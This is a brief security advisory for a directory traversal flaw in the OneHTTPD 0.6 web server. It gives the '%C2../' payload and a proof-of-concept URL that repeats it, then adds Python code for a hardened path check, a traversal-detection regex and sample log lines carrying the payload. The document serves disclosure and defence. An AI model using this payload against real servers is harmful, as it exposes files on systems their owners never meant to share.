|=================================================================================================|

 Vulnerability............Directory Traversal
 Software.................OneHTTPD 0.6
 Download.................http://onehttpd.googlecode.com/files/onehttpd-0.6.exe
 Date.....................4/27/10

|=================================================================================================|

 Site.....................http://cross-site-scripting.blogspot.com/
 Email....................john.leitch5@gmail.com

|=================================================================================================|

 ##Description##

 It's possible to navigate the local file system of a server running OneHTTPD 0.6 by using a
 specially crafted URL.


 ##Exploit##

 %C2../


 ##Proof of Concept##

 http://localhost/%C2../%C2../%C2../%C2../%C2../%C2../%C2../%C2../

|=================================================================================================|
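The advisory does not say where OneHTTPD's check goes wrong, so the following is an added example, not the server's code: an assumed vulnerable pre-decode check of the kind the %C2../ pattern slips past, beside a decode-then-validate version that rejects it, plus a log check for the pattern. DOCROOT and the log lines are constructed assumptions.

```python
import os
import re
from urllib.parse import unquote_to_bytes

DOCROOT = os.path.realpath("/var/www/html")  # assumption: the served directory


def naive_allows(raw_path: str) -> bool:
    """Assumed vulnerable pattern: compare URL segments before percent-decoding.
    The stray %C2 byte in front of '..' keeps the segment from matching, so the
    traversal is allowed through (consistent with the PoC above)."""
    return all(seg != ".." for seg in raw_path.split("/"))


def hardened_resolve(raw_path: str):
    """Decode first, validate afterwards; return the resolved path or None."""
    decoded = unquote_to_bytes(raw_path.split("?", 1)[0])
    try:
        text = decoded.decode("utf-8")  # a lone 0xC2 lead byte is rejected here
    except UnicodeDecodeError:
        return None
    if any(seg == ".." for seg in re.split(r"[/\\]", text)):
        return None  # dot-dot segment after decoding, whatever preceded it
    full = os.path.realpath(os.path.join(DOCROOT, text.lstrip("/\\")))
    if os.path.commonpath([DOCROOT, full]) != DOCROOT:
        return None  # last line of defence: the file must stay under DOCROOT
    return full


# Detection side: dot-dot followed by a separator, raw or percent-encoded.
TRAVERSAL_RE = re.compile(r"(?i)(?:\.\.|%2e%2e)(?:[/\\]|%2f|%5c)")


def flag_log_lines(lines):
    """Return the access-log lines whose request carries a traversal sequence."""
    return [line for line in lines if TRAVERSAL_RE.search(line)]


SAMPLE_LOG = [  # constructed sample lines, not real traffic
    '10.0.0.5 - - [27/Apr/2010:10:00:01] "GET /index.html HTTP/1.1" 200 512',
    '10.0.0.9 - - [27/Apr/2010:10:00:02] "GET /%C2../%C2../%C2../ HTTP/1.1" 200 210',
    '10.0.0.9 - - [27/Apr/2010:10:00:03] "GET /..%2f..%2f HTTP/1.1" 403 0',
]
```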